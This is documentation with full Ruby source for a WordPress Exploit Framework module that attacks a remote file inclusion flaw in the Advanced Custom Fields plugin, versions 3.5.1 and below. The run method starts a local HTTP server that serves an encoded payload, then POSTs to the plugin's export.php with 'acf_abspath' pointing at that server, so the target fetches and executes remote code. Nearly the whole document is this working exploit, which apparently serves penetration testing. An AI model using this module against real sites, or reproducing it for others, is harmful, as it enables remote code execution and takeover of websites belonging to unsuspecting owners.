class Wpxf::Exploit::AdvancedCustomFieldsRemoteFileInclusion
Public Class Methods
new()
Calls superclass method
Wpxf::Net::HttpServer::new
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 7
# Sets up the module metadata and registers the options it requires.
#
# According to the description registered here, the affected releases of the
# Advanced Custom Fields plugin are 3.5.1 and earlier, and the issue is only
# reachable when the PHP option "allow_url_include" is enabled, which the
# description notes is disabled by default.
def initialize
  super

  # Joined with single spaces so the resulting text matches the original
  # multi-line literal exactly.
  description = [
    'The Advanced Custom Fields plugin, in versions 3.5.1 and below,',
    'allows for remote file inclusion and remote code execution via',
    'the export.php script. This exploit only works when the PHP',
    'option "allow_url_include" is enabled (disabled by default).'
  ].join(' ')

  credits = [
    'Charlie Eriksen <charlie[at]ceriksen.com>', # Vulnerability disclosure
    'rastating' # WPXF module
  ]

  advisories = [
    ['URL', 'http://secunia.com/advisories/51037/'],
    ['WPVDB', '6103']
  ]

  update_info(
    name: 'Advanced Custom Fields Remote File Inclusion',
    desc: description,
    author: credits,
    references: advisories,
    date: 'Nov 14 2012'
  )

  # Address placed in the URL built by #rfi_url; no default, so it must be supplied.
  host_option = StringOption.new(
    name: 'rfi_host',
    desc: 'The address of the host listening for a connection',
    required: true
  )

  # Path component of that URL; defaults to an 8-character random alphabetic string.
  path_option = StringOption.new(
    name: 'rfi_path',
    desc: 'The path to access via the remote file inclusion request',
    default: Utility::Text.rand_alpha(8),
    required: true
  )

  register_options([host_option, path_option])
end
Public Instance Methods
check()
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 46
# Delegates the version check to check_plugin_version_from_readme and returns
# whatever that helper returns.
def check
  plugin_slug = 'advanced-custom-fields'
  # NOTE(review): presumably the first release outside the affected range
  # ("3.5.1 and below" per the module description) -- confirm against the
  # helper's contract.
  reference_version = '3.5.2'

  check_plugin_version_from_readme(plugin_slug, reference_version)
end
on_http_request(path, params, headers)
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 62
# Returns the encoded payload, ignoring all three arguments.
#
# NOTE(review): presumably the callback the HTTP server superclass invokes for
# each incoming request, with the return value used as the response body --
# confirm against Wpxf::Net::HttpServer.
def on_http_request(path, params, headers)
  response_body = payload.encoded
  response_body
end
plugin_url()
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 42
# Builds the URL of the plugin's directory by joining the site's plugins URL
# with the plugin slug.
def plugin_url
  plugins_root = wordpress_url_plugins
  normalize_uri(plugins_root, 'advanced-custom-fields')
end
rfi_host()
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 50
# Reads the normalized value of the 'rfi_host' option.
def rfi_host
  option_name = 'rfi_host'
  normalized_option_value(option_name)
end
rfi_path()
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 54
# Reads the normalized value of the 'rfi_path' option.
def rfi_path
  option_name = 'rfi_path'
  normalized_option_value(option_name)
end
rfi_url()
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 58
# Assembles the plain-HTTP URL from the 'rfi_host' option, the HTTP server's
# bind port and the 'rfi_path' option.
def rfi_url
  # %s stringifies each value the same way string interpolation does.
  format('http://%s:%s/%s', rfi_host, http_server_bind_port, rfi_path)
end
run()
Calls superclass method
Wpxf::Module#run
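# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 70
# Runs the module: starts the built-in HTTP server, sends a single POST to
# #vulnerable_url with 'acf_abspath' set to #rfi_url, stops the server and
# reports the outcome.
#
# Returns false when the superclass run fails, when no response object comes
# back, or when the response indicates that "allow_url_include" is disabled
# (status 500 or a body mentioning the option). Returns true otherwise.
def run
  return false unless super

  start_http_server(true)
  begin
    emit_info 'Executing request...'
    res = execute_post_request(
      url: vulnerable_url,
      body: { 'acf_abspath' => rfi_url }
    )
  ensure
    # Shut the listener down even if the request raised, so the server is
    # never left running after the module exits.
    stop_http_server
  end

  # The original dereferenced res before the nil check it performed further
  # down; guard once, up front, so a missing response is reported cleanly.
  if res.nil?
    emit_error 'No response received from the target'
    return false
  end

  emit_info "Response code: #{res.code}", true
  emit_info "Response body: #{res.body}", true

  # PHP reports the refused include either as a server error or in a message
  # that names the option.
  if res.code == 500 || res.body =~ /allow_url_include/
    emit_error 'allow_url_include appears to be disabled'
    return false
  end

  emit_success "Result: #{res.body}" if res.code == 200 && !res.body.strip.empty?

  true
end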
vulnerable_url()
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 66
# Builds the URL of the plugin's core/actions/export.php script, the script
# the module description identifies as the affected one.
def vulnerable_url
  script_segments = %w[core actions export.php]
  normalize_uri(plugin_url, *script_segments)
end